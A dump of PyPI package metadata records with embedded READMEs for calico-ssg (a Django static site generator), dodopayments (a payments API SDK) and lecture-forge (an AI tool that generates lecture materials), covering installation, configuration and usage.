"pytest<=9.0.2; extra == \"dev\"",
"twine<=6.2.0; extra == \"dev\"",
"pygments<=2.19.2; extra == \"docs\"",
"shibuya<=2025.12.19; extra == \"docs\"",
"sphinx-autobuild<=2025.8.25; extra == \"docs\"",
"sphinx-copybutton<=0.5.2; extra == \"docs\"",
"sphinx-design<=0.6.1; extra == \"docs\"",
"sphinx-iconify<=0.2.1; extra == \"docs\"",
"sphinx<=9.0.4; extra == \"docs\"",
"tgcrypto<=1.2.5; extra == \"fast\"",
"uvloop<=0.21.0; (sys_platform == \"darwin\" or sys_platform == \"linux\") and extra == \"fast\""
] | [] | [] | [] | [
"Homepage, https://kurigram.icu",
"Documentation, https://docs.kurigram.icu",
"Source, https://github.com/KurimuzonAkuma/pyrogram",
"Issues, https://github.com/KurimuzonAkuma/pyrogram/issues",
"Community, https://t.me/kurigram_chat"
] | twine/6.1.0 CPython/3.13.7 | 2026-02-20T09:36:08.844805 | kurigram-2.2.19.tar.gz | 557,685 | aa/3c/0c5469b66ea5ad887d7b877b08113726e6d67ef622442c8dd7adbcf9e352/kurigram-2.2.19.tar.gz | source | sdist | null | false | 591c4aa932d5afd9dcbd22aafc9896b3 | 6d86a870834527e91c6308f8307796a985a437a39e8112e3bc7a649c6d1f7daa | aa3c0c5469b66ea5ad887d7b877b08113726e6d67ef622442c8dd7adbcf9e352 | LGPL-3.0-or-later | [
"COPYING",
"COPYING.lesser"
] | 0 |
2.4 | calico-ssg | 0.4.2 | Django-based static site generator | # Calico - Django-based Static Site Generator
Calico is a powerful static site generator built on top of Django, combining the flexibility of Django's templating system with the simplicity and performance of static websites.
## Features
- **Django-powered**: Leverage Django's robust templating engine and ecosystem
- **Plugin System**: Extensible architecture using pluggy (via djp)
- **Widget-based Components**: Modular, reusable UI components
- **Multiple Themes**: Built-in PicoCSS theme with support for custom themes
- **Blog System**: Full-featured blog plugin with categories, tags, and RSS
- **Collections**: Organize and display grouped content
- **Development Server**: Live-reload development environment
- **Search Support**: Built-in search functionality with lunr.js
## Installation
```bash
pip install calico-ssg
```
Or install from source:
```bash
git clone https://codeberg.org/emmaDelescolle/calico.git
cd calico
pip install -e .
```
## Quick Start
1. **Initialize a new site**:
```bash
calico init
```
2. **Start the development server**:
```bash
calico run
```
3. **Build your static site**:
```bash
calico build
```
## Creating Content
Content in Calico is written in Markdown with YAML frontmatter:
```markdown
---
title: My First Post
date: 2024-01-15
tags: [introduction, calico]
---
# Welcome to My Site
This is my first post using Calico!
```
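Under the hood, this format splits cleanly into a YAML header and a Markdown body. The sketch below is a simplified, stdlib-only stand-in for what a frontmatter parser such as the `python-frontmatter` package (one of Calico's dependencies) does; real parsers handle full YAML, quoting, and edge cases:

```python
def split_frontmatter(text: str):
    """Split a Markdown document into (metadata_text, body).

    Simplified sketch: assumes the document starts with a '---' line
    and the metadata block is closed by the next '---' line.
    """
    lines = text.splitlines()
    if not lines or lines[0].strip() != "---":
        return "", text  # no frontmatter present
    try:
        end = lines[1:].index("---") + 1  # index of the closing '---'
    except ValueError:
        return "", text  # unterminated frontmatter: treat as plain body
    meta = "\n".join(lines[1:end])
    body = "\n".join(lines[end + 1:]).lstrip("\n")
    return meta, body


doc = """---
title: My First Post
date: 2024-01-15
---

# Welcome to My Site
"""
meta, body = split_frontmatter(doc)
print(meta)   # the title/date lines
print(body)   # the Markdown body
```

In practice you would call `frontmatter.load(path)` and read `post.metadata` / `post.content` rather than rolling your own.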
## Plugin Development
Create custom plugins to extend Calico's functionality:
```bash
calico start_plugin my_plugin
```
Plugins can hook into various aspects of the build process:
- Add template tags and filters
- Register themes and templates
- Include CSS and JavaScript
- Define custom content collections
- Add context processors
## Project Structure
```
my-site/
├── content/      # Markdown content files
├── static/       # Static assets (images, css, js)
├── templates/    # Custom templates
├── plugins/      # Local plugins
└── config.yml    # Site configuration
```
## Documentation
For detailed documentation, visit [https://calico-ssg.com/docs/index.html](https://calico-ssg.com/docs/index.html).
## Contributing
Contributions are welcome! Please feel free to submit issues and pull requests to the [Calico repository](https://codeberg.org/emmaDelescolle/calico).
## License
Calico is distributed under the MIT License.
## Links
- **Documentation**: [https://calico-ssg.com/docs/index.html](https://calico-ssg.com/docs/index.html)
- **Source Code**: [https://codeberg.org/emmaDelescolle/calico](https://codeberg.org/emmaDelescolle/calico)
- **Issue Tracker**: [https://codeberg.org/emmaDelescolle/calico/issues](https://codeberg.org/emmaDelescolle/calico/issues)
| text/markdown | LevIT SCS | LevIT SCS <info@levit.be> | null | null | null | null | [
"Environment :: Web Environment",
"Framework :: Django",
"Framework :: Django :: 4.2",
"Framework :: Django :: 5.0",
"Framework :: Django :: 5.1",
"Framework :: Django :: 5.2",
"Framework :: Django :: 6.0",
"Intended Audience :: Developers",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
"Programming Language :: Python",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.9",
"Programming Language :: Python :: 3.10",
"Programming Language :: Python :: 3.11",
"Programming Language :: Python :: 3.12",
"Programming Language :: Python :: 3.13",
"Programming Language :: Python :: 3.14",
"Topic :: Internet :: WWW/HTTP",
"Topic :: Internet :: WWW/HTTP :: Dynamic Content"
] | [] | https://codeberg.org/emmaDelescolle/calico | null | null | [] | [] | [] | [
"click>=8.1.7",
"Django<6.2,>=4.2",
"django-browser-reload>=1.16.0",
"django-distill>=3.2.4",
"django-markdown-deux>=1.0.6",
"django-templateyak>=0.0.2",
"djp>=0.3.1",
"dj_angles>=0.10.0",
"nanodjango>=0.9.2",
"pillow==10.4.0",
"python-dotenv>=1.0.1",
"python-frontmatter>=1.1.0",
"readtime==3.0.0",
"lunr>=0.6.2",
"tox>=4.0; extra == \"dev\"",
"pytest>=8.0; extra == \"dev\"",
"pytest-cov>=4.1; extra == \"dev\"",
"pytest-xdist>=3.5; extra == \"dev\"",
"ruff>=0.1.0; extra == \"dev\""
] | [] | [] | [] | [
"Homepage, https://calico-ssg.com",
"Documentation, https://calico-ssg.com/docs/index.html",
"Repository, https://codeberg.org/emmaDelescolle/calico",
"Bug Tracker, https://codeberg.org/emmaDelescolle/calico/issues"
] | twine/6.2.0 CPython/3.13.11 | 2026-02-20T09:35:43.156557 | calico_ssg-0.4.2.tar.gz | 59,383 | 78/e8/46004be0db683aa3aa85f22b1d3103ff6a9db972ffad55bc0b01ba686a7d/calico_ssg-0.4.2.tar.gz | source | sdist | null | false | 1883dd56936c2575b6ad3b73d523b00e | 0fd1d8adb9b18e377f7474a1c2fa7912eac6783ae5d8bb7b523e923b79dc1e82 | 78e846004be0db683aa3aa85f22b1d3103ff6a9db972ffad55bc0b01ba686a7d | null | [
"LICENSE.md"
] | 220 |
2.3 | dodopayments | 1.84.0 | The official Python library for the Dodo Payments API | # Dodo Payments Python API library
The [Dodo Payments](https://dodopayments.com) Python library provides convenient access to the Dodo Payments REST API from any Python 3.9+
application. The library includes type definitions for all request params and response fields,
and offers both synchronous and asynchronous clients powered by [httpx](https://github.com/encode/httpx).
It is generated with [Stainless](https://www.stainless.com/).
## MCP Server
Use the Dodo Payments MCP Server to enable AI assistants to interact with this API, allowing them to explore endpoints, make test requests, and use documentation to help integrate this SDK into your application.
[](https://cursor.com/en-US/install-mcp?name=dodopayments-mcp&config=eyJjb21tYW5kIjoibnB4IiwiYXJncyI6WyIteSIsImRvZG9wYXltZW50cy1tY3AiXSwiZW52Ijp7IkRPRE9fUEFZTUVOVFNfQVBJX0tFWSI6Ik15IEJlYXJlciBUb2tlbiIsIkRPRE9fUEFZTUVOVFNfV0VCSE9PS19LRVkiOiJNeSBXZWJob29rIEtleSJ9fQ)
[](https://vscode.stainless.com/mcp/%7B%22name%22%3A%22dodopayments-mcp%22%2C%22command%22%3A%22npx%22%2C%22args%22%3A%5B%22-y%22%2C%22dodopayments-mcp%22%5D%2C%22env%22%3A%7B%22DODO_PAYMENTS_API_KEY%22%3A%22My%20Bearer%20Token%22%2C%22DODO_PAYMENTS_WEBHOOK_KEY%22%3A%22My%20Webhook%20Key%22%7D%7D)
> Note: You may need to set environment variables in your MCP client.
## Documentation
The REST API documentation can be found on [docs.dodopayments.com](https://docs.dodopayments.com/api-reference/introduction). The full API of this library can be found in [api.md](https://github.com/dodopayments/dodopayments-python/tree/main/api.md).
## Installation
```sh
# install from PyPI
pip install dodopayments
```
## Usage
The full API of this library can be found in [api.md](https://github.com/dodopayments/dodopayments-python/tree/main/api.md).
```python
import os
from dodopayments import DodoPayments
client = DodoPayments(
bearer_token=os.environ.get("DODO_PAYMENTS_API_KEY"), # This is the default and can be omitted
# defaults to "live_mode".
environment="test_mode",
)
checkout_session_response = client.checkout_sessions.create(
product_cart=[
{
"product_id": "product_id",
"quantity": 0,
}
],
)
print(checkout_session_response.session_id)
```
While you can provide a `bearer_token` keyword argument,
we recommend using [python-dotenv](https://pypi.org/project/python-dotenv/)
to add `DODO_PAYMENTS_API_KEY="My Bearer Token"` to your `.env` file
so that your Bearer Token is not stored in source control.
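Conceptually, `python-dotenv` reads `KEY=VALUE` pairs from the `.env` file and places them into the process environment before the client is constructed. A minimal stdlib sketch of that idea (the real library also handles quoting, comments, multiline values, and by default does not override variables that are already set):

```python
import os
import tempfile


def load_env_file(path: str) -> None:
    """Minimal stand-in for dotenv's load_dotenv(): read KEY=VALUE lines."""
    with open(path) as f:
        for line in f:
            line = line.strip()
            if not line or line.startswith("#") or "=" not in line:
                continue  # skip blanks, comments, and malformed lines
            key, _, value = line.partition("=")
            os.environ[key.strip()] = value.strip()


# Demo with a throwaway .env file
with tempfile.NamedTemporaryFile("w", suffix=".env", delete=False) as f:
    f.write("# secrets live here\nDODO_PAYMENTS_API_KEY=My Bearer Token\n")
    env_path = f.name

load_env_file(env_path)
print(os.environ["DODO_PAYMENTS_API_KEY"])  # My Bearer Token
```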
## Async usage
Simply import `AsyncDodoPayments` instead of `DodoPayments` and use `await` with each API call:
```python
import os
import asyncio
from dodopayments import AsyncDodoPayments
client = AsyncDodoPayments(
bearer_token=os.environ.get("DODO_PAYMENTS_API_KEY"), # This is the default and can be omitted
# defaults to "live_mode".
environment="test_mode",
)
async def main() -> None:
checkout_session_response = await client.checkout_sessions.create(
product_cart=[
{
"product_id": "product_id",
"quantity": 0,
}
],
)
print(checkout_session_response.session_id)
asyncio.run(main())
```
Functionality between the synchronous and asynchronous clients is otherwise identical.
### With aiohttp
By default, the async client uses `httpx` for HTTP requests. However, for improved concurrency performance you may also use `aiohttp` as the HTTP backend.
You can enable this by installing `aiohttp`:
```sh
# install from PyPI
pip install dodopayments[aiohttp]
```
Then you can enable it by instantiating the client with `http_client=DefaultAioHttpClient()`:
```python
import os
import asyncio
from dodopayments import DefaultAioHttpClient
from dodopayments import AsyncDodoPayments
async def main() -> None:
async with AsyncDodoPayments(
bearer_token=os.environ.get(
"DODO_PAYMENTS_API_KEY"
), # This is the default and can be omitted
http_client=DefaultAioHttpClient(),
) as client:
checkout_session_response = await client.checkout_sessions.create(
product_cart=[
{
"product_id": "product_id",
"quantity": 0,
}
],
)
print(checkout_session_response.session_id)
asyncio.run(main())
```
## Using types
Nested request parameters are [TypedDicts](https://docs.python.org/3/library/typing.html#typing.TypedDict). Responses are [Pydantic models](https://docs.pydantic.dev) which also provide helper methods for things like:
- Serializing back into JSON, `model.to_json()`
- Converting to a dictionary, `model.to_dict()`
Typed requests and responses provide autocomplete and documentation within your editor. If you would like to see type errors in VS Code to help catch bugs earlier, set `python.analysis.typeCheckingMode` to `basic`.
## Pagination
List methods in the Dodo Payments API are paginated.
This library provides auto-paginating iterators with each list response, so you do not have to request successive pages manually:
```python
from dodopayments import DodoPayments
client = DodoPayments()
all_payments = []
# Automatically fetches more pages as needed.
for payment in client.payments.list():
# Do something with payment here
all_payments.append(payment)
print(all_payments)
```
Or, asynchronously:
```python
import asyncio
from dodopayments import AsyncDodoPayments
client = AsyncDodoPayments()
async def main() -> None:
all_payments = []
# Iterate through items across all pages, issuing requests as needed.
async for payment in client.payments.list():
all_payments.append(payment)
print(all_payments)
asyncio.run(main())
```
Alternatively, you can use the `.has_next_page()`, `.next_page_info()`, or `.get_next_page()` methods for more granular control working with pages:
```python
first_page = await client.payments.list()
if first_page.has_next_page():
print(f"will fetch next page using these details: {first_page.next_page_info()}")
next_page = await first_page.get_next_page()
print(f"number of items we just fetched: {len(next_page.items)}")
# Remove `await` for non-async usage.
```
Or just work directly with the returned data:
```python
first_page = await client.payments.list()
for payment in first_page.items:
print(payment.brand_id)
# Remove `await` for non-async usage.
```
## Nested params
Nested parameters are dictionaries, typed using `TypedDict`, for example:
```python
from dodopayments import DodoPayments
client = DodoPayments()
checkout_session_response = client.checkout_sessions.create(
product_cart=[
{
"product_id": "product_id",
"quantity": 0,
}
],
billing_address={"country": "AF"},
)
print(checkout_session_response.billing_address)
```
## Handling errors
When the library is unable to connect to the API (for example, due to network connection problems or a timeout), a subclass of `dodopayments.APIConnectionError` is raised.
When the API returns a non-success status code (that is, 4xx or 5xx
response), a subclass of `dodopayments.APIStatusError` is raised, containing `status_code` and `response` properties.
All errors inherit from `dodopayments.APIError`.
```python
import dodopayments
from dodopayments import DodoPayments
client = DodoPayments()
try:
client.checkout_sessions.create(
product_cart=[
{
"product_id": "product_id",
"quantity": 0,
}
],
)
except dodopayments.APIConnectionError as e:
print("The server could not be reached")
print(e.__cause__) # an underlying Exception, likely raised within httpx.
except dodopayments.RateLimitError as e:
print("A 429 status code was received; we should back off a bit.")
except dodopayments.APIStatusError as e:
print("Another non-200-range status code was received")
print(e.status_code)
print(e.response)
```
Error codes are as follows:
| Status Code | Error Type |
| ----------- | -------------------------- |
| 400 | `BadRequestError` |
| 401 | `AuthenticationError` |
| 403 | `PermissionDeniedError` |
| 404 | `NotFoundError` |
| 422 | `UnprocessableEntityError` |
| 429 | `RateLimitError` |
| >=500 | `InternalServerError` |
| N/A | `APIConnectionError` |
### Retries
Certain errors are automatically retried 2 times by default, with a short exponential backoff.
Connection errors (for example, due to a network connectivity problem), 408 Request Timeout, 409 Conflict,
429 Rate Limit, and >=500 Internal errors are all retried by default.
You can use the `max_retries` option to configure or disable retry settings:
```python
from dodopayments import DodoPayments
# Configure the default for all requests:
client = DodoPayments(
# default is 2
max_retries=0,
)
# Or, configure per-request:
client.with_options(max_retries=5).checkout_sessions.create(
product_cart=[
{
"product_id": "product_id",
"quantity": 0,
}
],
)
```
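To make "short exponential backoff" concrete: the wait before each retry typically doubles from attempt to attempt, up to a cap. The schedule below is purely illustrative; the SDK's actual base delay, cap, and jitter are internal details:

```python
def backoff_delays(max_retries: int, base: float = 0.5, cap: float = 8.0) -> list:
    """Illustrative exponential backoff schedule (values are assumptions)."""
    return [min(cap, base * (2 ** attempt)) for attempt in range(max_retries)]


print(backoff_delays(2))  # [0.5, 1.0] -- two retries, matching the default
print(backoff_delays(5))  # [0.5, 1.0, 2.0, 4.0, 8.0] -- capped at 8 seconds
```

Production retry loops usually add random jitter on top of a schedule like this so that many clients do not retry in lockstep.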
### Timeouts
By default requests time out after 1 minute. You can configure this with a `timeout` option,
which accepts a float or an [`httpx.Timeout`](https://www.python-httpx.org/advanced/timeouts/#fine-tuning-the-configuration) object:
```python
import httpx

from dodopayments import DodoPayments

# Configure the default for all requests:
client = DodoPayments(
# 20 seconds (default is 1 minute)
timeout=20.0,
)
# More granular control:
client = DodoPayments(
timeout=httpx.Timeout(60.0, read=5.0, write=10.0, connect=2.0),
)
# Override per-request:
client.with_options(timeout=5.0).checkout_sessions.create(
product_cart=[
{
"product_id": "product_id",
"quantity": 0,
}
],
)
```
On timeout, an `APITimeoutError` is thrown.
Note that requests that time out are [retried twice by default](https://github.com/dodopayments/dodopayments-python/tree/main/#retries).
## Advanced
### Logging
We use the standard library [`logging`](https://docs.python.org/3/library/logging.html) module.
You can enable logging by setting the environment variable `DODO_PAYMENTS_LOG` to `info`.
```shell
$ export DODO_PAYMENTS_LOG=info
```
Or to `debug` for more verbose logging.
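Since this is the standard `logging` module, you can also configure verbosity from Python code instead of the environment variable. The logger name `dodopayments` below is an assumption based on the usual convention of logging under the package name:

```python
import logging

# Send log records to the console with the default format
logging.basicConfig(level=logging.WARNING)

# Enable verbose output for the SDK only (logger name is an assumption)
sdk_logger = logging.getLogger("dodopayments")
sdk_logger.setLevel(logging.DEBUG)
```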
### How to tell whether `None` means `null` or missing
In an API response, a field may be explicitly `null`, or missing entirely; in either case, its value is `None` in this library. You can differentiate the two cases with `.model_fields_set`:
```py
if response.my_field is None:
if 'my_field' not in response.model_fields_set:
print('Got json like {}, without a "my_field" key present at all.')
else:
print('Got json like {"my_field": null}.')
```
### Accessing raw response data (e.g. headers)
The "raw" Response object can be accessed by prefixing `.with_raw_response.` to any HTTP method call, e.g.,
```py
from dodopayments import DodoPayments
client = DodoPayments()
response = client.checkout_sessions.with_raw_response.create(
product_cart=[{
"product_id": "product_id",
"quantity": 0,
}],
)
print(response.headers.get('X-My-Header'))
checkout_session = response.parse() # get the object that `checkout_sessions.create()` would have returned
print(checkout_session.session_id)
```
These methods return an [`APIResponse`](https://github.com/dodopayments/dodopayments-python/tree/main/src/dodopayments/_response.py) object.
The async client returns an [`AsyncAPIResponse`](https://github.com/dodopayments/dodopayments-python/tree/main/src/dodopayments/_response.py) with the same structure, the only difference being `await`able methods for reading the response content.
#### `.with_streaming_response`
The above interface eagerly reads the full response body when you make the request, which may not always be what you want.
To stream the response body, use `.with_streaming_response` instead, which requires a context manager and only reads the response body once you call `.read()`, `.text()`, `.json()`, `.iter_bytes()`, `.iter_text()`, `.iter_lines()` or `.parse()`. In the async client, these are async methods.
```python
with client.checkout_sessions.with_streaming_response.create(
product_cart=[
{
"product_id": "product_id",
"quantity": 0,
}
],
) as response:
print(response.headers.get("X-My-Header"))
for line in response.iter_lines():
print(line)
```
The context manager is required so that the response will reliably be closed.
### Making custom/undocumented requests
This library is typed for convenient access to the documented API.
If you need to access undocumented endpoints, params, or response properties, the library can still be used.
#### Undocumented endpoints
To make requests to undocumented endpoints, you can make requests using `client.get`, `client.post`, and other
http verbs. Options on the client will be respected (such as retries) when making this request.
```py
import httpx
response = client.post(
"/foo",
cast_to=httpx.Response,
body={"my_param": True},
)
print(response.headers.get("x-foo"))
```
#### Undocumented request params
If you want to explicitly send an extra param, you can do so with the `extra_query`, `extra_body`, and `extra_headers` request
options.
#### Undocumented response properties
To access undocumented response properties, you can access the extra fields like `response.unknown_prop`. You
can also get all the extra fields on the Pydantic model as a dict with
[`response.model_extra`](https://docs.pydantic.dev/latest/api/base_model/#pydantic.BaseModel.model_extra).
### Configuring the HTTP client
You can directly override the [httpx client](https://www.python-httpx.org/api/#client) to customize it for your use case, including:
- Support for [proxies](https://www.python-httpx.org/advanced/proxies/)
- Custom [transports](https://www.python-httpx.org/advanced/transports/)
- Additional [advanced](https://www.python-httpx.org/advanced/clients/) functionality
```python
import httpx
from dodopayments import DodoPayments, DefaultHttpxClient
client = DodoPayments(
# Or use the `DODO_PAYMENTS_BASE_URL` env var
base_url="http://my.test.server.example.com:8083",
http_client=DefaultHttpxClient(
proxy="http://my.test.proxy.example.com",
transport=httpx.HTTPTransport(local_address="0.0.0.0"),
),
)
```
You can also customize the client on a per-request basis by using `with_options()`:
```python
client.with_options(http_client=DefaultHttpxClient(...))
```
### Managing HTTP resources
By default the library closes underlying HTTP connections whenever the client is [garbage collected](https://docs.python.org/3/reference/datamodel.html#object.__del__). You can manually close the client using the `.close()` method if desired, or with a context manager that closes when exiting.
```py
from dodopayments import DodoPayments
with DodoPayments() as client:
# make requests here
...
# HTTP client is now closed
```
## Versioning
This package generally follows [SemVer](https://semver.org/spec/v2.0.0.html) conventions, though certain backwards-incompatible changes may be released as minor versions:
1. Changes that only affect static types, without breaking runtime behavior.
2. Changes to library internals which are technically public but not intended or documented for external use. _(Please open a GitHub issue to let us know if you are relying on such internals.)_
3. Changes that we do not expect to impact the vast majority of users in practice.
We take backwards-compatibility seriously and work hard to ensure you can rely on a smooth upgrade experience.
We are keen for your feedback; please open an [issue](https://www.github.com/dodopayments/dodopayments-python/issues) with questions, bugs, or suggestions.
### Determining the installed version
If you've upgraded to the latest version but aren't seeing any new features you were expecting then your python environment is likely still using an older version.
You can determine the version that is being used at runtime with:
```py
import dodopayments
print(dodopayments.__version__)
```
## Requirements
Python 3.9 or higher.
## Contributing
See [the contributing documentation](https://github.com/dodopayments/dodopayments-python/tree/main/./CONTRIBUTING.md).
| text/markdown | null | Dodo Payments <support@dodopayments.com> | null | null | Apache-2.0 | null | [
"Intended Audience :: Developers",
"License :: OSI Approved :: Apache Software License",
"Operating System :: MacOS",
"Operating System :: Microsoft :: Windows",
"Operating System :: OS Independent",
"Operating System :: POSIX",
"Operating System :: POSIX :: Linux",
"Programming Language :: Python :: 3.9",
"Programming Language :: Python :: 3.10",
"Programming Language :: Python :: 3.11",
"Programming Language :: Python :: 3.12",
"Programming Language :: Python :: 3.13",
"Programming Language :: Python :: 3.14",
"Topic :: Software Development :: Libraries :: Python Modules",
"Typing :: Typed"
] | [] | null | null | >=3.9 | [] | [] | [] | [
"anyio<5,>=3.5.0",
"distro<2,>=1.7.0",
"httpx<1,>=0.23.0",
"pydantic<3,>=1.9.0",
"sniffio",
"typing-extensions<5,>=4.10",
"aiohttp; extra == \"aiohttp\"",
"httpx-aiohttp>=0.1.9; extra == \"aiohttp\"",
"standardwebhooks; extra == \"webhooks\""
] | [] | [] | [] | [
"Homepage, https://github.com/dodopayments/dodopayments-python",
"Repository, https://github.com/dodopayments/dodopayments-python"
] | twine/5.1.1 CPython/3.12.9 | 2026-02-20T09:34:47.053317 | dodopayments-1.84.0.tar.gz | 211,392 | 95/7e/c46ae33f8eba5d5fd76d9c24a649c52264ae21e0d8718a0ce440924120c3/dodopayments-1.84.0.tar.gz | source | sdist | null | false | c7a5d5ece17f47fa75f2ca0993d7798d | 35e04fd7c999978db2b00c122a48430cad4ba6ef073b57caf41d5cd52c6b2671 | 957ec46ae33f8eba5d5fd76d9c24a649c52264ae21e0d8718a0ce440924120c3 | null | [] | 686 |
2.4 | lecture-forge | 0.3.8 | AI-powered lecture material generator with multilingual support using LangChain | # LectureForge 🎓
**AI-Powered Lecture Material Generator using Multi-Agent Pipeline System**
[](https://www.python.org/downloads/)
[](https://github.com/bullpeng72/Lecture_forge)
[](https://opensource.org/licenses/MIT)
[](https://github.com/bullpeng72/Lecture_forge)
[](https://github.com/bullpeng72/Lecture_forge)
> 🚀 **v0.3.8 Beta Release** | RMC Self-Review 🧠 (hallucination detection, curriculum logic check, content quality review)
An AI system that automatically generates high-quality lecture materials by gathering information from PDFs, web pages, and internet search.
**Key stats**: 10 agents | 9 tools | 7 CLI commands | 827+ tests (~48% coverage) | ~$0.035 per 60-minute lecture | **Python 3.11 recommended**
**Data location**: `~/Documents/LectureForge/` (a regular folder, directly accessible from Finder/Explorer)
---
## 📋 Table of Contents
- [Key Features](#-key-features)
- [Quick Start](#-quick-start)
- [Usage](#-usage)
- [Command Guide](#-command-guide)
- [FAQ](#-faq)
- [Changelog](#-changelog)
- [Contributing](#-contributing)
---
## ✨ Key Features
### Content Generation
- 📚 **Multi-source collection**: Comprehensive information gathering from PDFs, URLs, and web search
- 📍 **Location-based image matching**: Automatic image placement driven by RAG context (+750% image utilization)
- 🖼️ **Interactive image editing**: Delete or replace images in a generated lecture (vector-DB-backed alternative search)
- 🎨 **Structured HTML output**: Mermaid diagrams, search index, code highlighting
- 🎬 **Presentation slides**: Automatic Reveal.js-based conversion (greatly improved in v0.3.0)
### Quality Assurance
- ✅ **Six-dimension quality evaluation**: completeness, flow, timing, difficulty, visuals, accuracy
- 🔄 **Automatic improvement**: Up to 3 automatic revision passes when quality falls below the threshold
- 🧠 **RMC self-review** (v0.3.8+): Two-stage in-agent self-reflection (Layer 1 review + Layer 2 review of the review)
  - **CurriculumDesigner**: Automatically verifies and fixes section-order logic, learning-objective coverage, and prerequisite ordering
  - **ContentWriter**: Semantic quality review and revision of conceptual leaps, ambiguous explanations, and broken flow
  - **QAAgent**: Checks each claim against the source context → removes hallucinated items or flags them with warnings
- 🧪 **Test coverage**: 827+ test functions (81 files, ~48% coverage)
### Knowledge Management
- 🗄️ **RAG-based knowledge base**: Interactive Q&A backed by a ChromaDB vector database
- 🌐 **Multilingual support**: Mixed Korean/English PDFs, automatic language detection, cross-lingual search (v0.3.2+)
- 🎯 **Advanced RAG quality** (v0.3.5+):
  - 400-word structured answers (5 enforced Markdown sections)
  - 15+15 dual-query search (multilingual, top-12 results)
  - Rich Markdown panel rendering (beautiful terminal output)
  - Dynamic confidence scores (correct conversion of ChromaDB L2 distances)
- ⚡ **Query caching**: 60% faster responses to repeated questions
- 💬 **Source citations**: Automatic references with page numbers
### Stability & Performance
- 🔄 **Automatic retries**: Exponential backoff on API failures (up to 3 attempts)
- 💰 **Cost tracking**: Real-time token usage and cost estimation
- 🔧 **Type hints**: 71% type coverage
- 🎯 **Exception handling**: Structured exception system (9 categories)
- 📝 **Prompt management**: Template-based prompt system
---
## 🚀 Recent Improvements (v0.3.8)
**In-agent self-reflection system (RMC, Reflective Meta-Cognition)**:
- **CurriculumDesigner**: Automatically fixes section ordering by graded difficulty, learning-objective coverage, and prerequisite placement
- **ContentWriter**: Semantic review and revision of conceptual leaps, ambiguous explanations, code-to-explanation linkage, and duplicated content
- **QAAgent**: Classifies each claim as ✓/~/✗ → removes unsupported (✗) items or flags them with warnings
- Non-critical by design: if RMC fails, the original output is returned and the existing pipeline is unaffected
**LLM refusal handling fix** (`content_writer/agent.py`):
- Dedicated safe prompt for conclusion/introduction sections (`_build_structural_section_prompt()`)
- Automatic retry with the safe prompt when a refusal pattern is detected
**Mermaid slide bug fix** (`--with-notes`):
- `SlideNotesGenerator`: Fixed an encoding issue where `-->` arrows were escaped during BeautifulSoup `str(soup)` serialization
**Python 3.13 verified**: Full dependency compatibility confirmed
> See the [changelog below](#-changelog) for the full history
---
## 🚀 Quick Start
### 1️⃣ Installation
#### Option 1: Install with pipx (easiest ⭐⭐)
```bash
# Install pipx (if you don't have it yet)
pip install pipx
pipx ensurepath
# Install lecture-forge (isolated environment, set up automatically)
pipx install lecture-forge
# Install playwright (add it to the pipx environment)
pipx inject lecture-forge playwright
pipx runpip lecture-forge install playwright
playwright install chromium
# Use it
lecture-forge create
```
**Why pipx**:
- ✅ Installs into an isolated environment automatically
- ✅ The `lecture-forge` command is available system-wide
- ✅ No dependency conflicts with other Python projects
- ✅ No conda/venv environment management needed
#### Option 2: PyPI + conda environment (recommended ⭐)
```bash
# Create a Python 3.11 environment (strongly recommended)
conda create -n lecture-forge python=3.11
conda activate lecture-forge
# Install from PyPI
pip install lecture-forge
# Install the browser used for web scraping
playwright install chromium
```
#### Option 3: Development install (to modify the source)
```bash
# Clone the repository
git clone https://github.com/bullpeng72/Lecture_forge.git
cd Lecture_forge
# Create a Python 3.11 environment
conda create -n lecture-forge python=3.11
conda activate lecture-forge
# Install from the local source
pip install -e .
# Install the browser used for web scraping
playwright install chromium
```
> **Python version compatibility**:
> - ✅ **Python 3.11**: **strongly recommended**; all dependencies fully supported
> - ✅ **Python 3.12**: fully supported; official support since v0.3.3
> - ✅ **Python 3.13**: supported; verified since v0.3.8
>
> **Python 3.11, 3.12, and 3.13 are all supported.**
### 2️⃣ Configuration
#### Option 1: Interactive setup (recommended ⭐)
```bash
# Run the interactive setup wizard
lecture-forge init
```
This command does the following:
- ✅ Automatically creates a `.env` file in the best location for your platform:
  - **Windows**: `%USERPROFILE%\Documents\LectureForge\.env`
  - **Mac/Linux**: `~/Documents/LectureForge/.env`
- ✅ Guides you through entering the required API keys (OpenAI, Serper)
- ✅ Offers optional image search API setup (Pexels, Unsplash)
- ✅ Sets file permissions automatically (Unix/Mac: 600)
#### Option 2: Manual setup
```bash
# Create the .env file (when working in the project checkout)
cp .env.example .env
```
Open the `.env` file and configure the following:
**Required API keys**:
```bash
# OpenAI API (required)
OPENAI_API_KEY=sk-proj-...
# Search API (required)
SERPER_API_KEY=... # free: 2,500 requests/month
```
**Optional**:
```bash
# Image search APIs (optional)
PEXELS_API_KEY=... # free, unlimited
UNSPLASH_ACCESS_KEY=... # free: 50 requests/hour
# Search and crawling settings (defaults are usually fine)
SEARCH_NUM_RESULTS=10 # number of search results (max 100)
DEEP_CRAWLER_MAX_PAGES=10 # pages to crawl
IMAGE_SEARCH_PER_PAGE=10 # image search results per query
# Quality settings
QUALITY_THRESHOLD=80 # quality threshold (70-90)
MAX_ITERATIONS=3 # maximum improvement iterations
```
💡 **See `.env.example` for more configuration options**
#### .env file location
LectureForge searches for the `.env` file in the following order:
1. **Environment variable**: the path set in `LECTURE_FORGE_ENV_FILE`
2. **Current directory**: `./.env`
3. **User directory** (recommended):
- Windows: `%USERPROFILE%\Documents\LectureForge\.env`
- Mac/Linux: `~/Documents/LectureForge/.env`
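The lookup order above can be sketched in a few lines of Python. This is only an illustration: the function name `resolve_env_file` and the exact logic are assumptions, not the library's actual implementation.

```python
import os
from pathlib import Path

def resolve_env_file() -> Path:
    """Illustrative sketch of the documented .env lookup order."""
    # 1. Explicit override via the LECTURE_FORGE_ENV_FILE environment variable
    override = os.environ.get("LECTURE_FORGE_ENV_FILE")
    if override:
        return Path(override)
    # 2. A .env file in the current working directory
    cwd_env = Path.cwd() / ".env"
    if cwd_env.exists():
        return cwd_env
    # 3. Fall back to the per-user default under Documents/LectureForge
    return Path.home() / "Documents" / "LectureForge" / ".env"
```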
**Getting API keys**:
- **OpenAI**: [platform.openai.com](https://platform.openai.com/) (usage-based billing)
- **Serper**: [serper.dev](https://serper.dev/) (free: 2,500 requests/month)
- **Pexels**: [pexels.com/api](https://www.pexels.com/api/) (free)
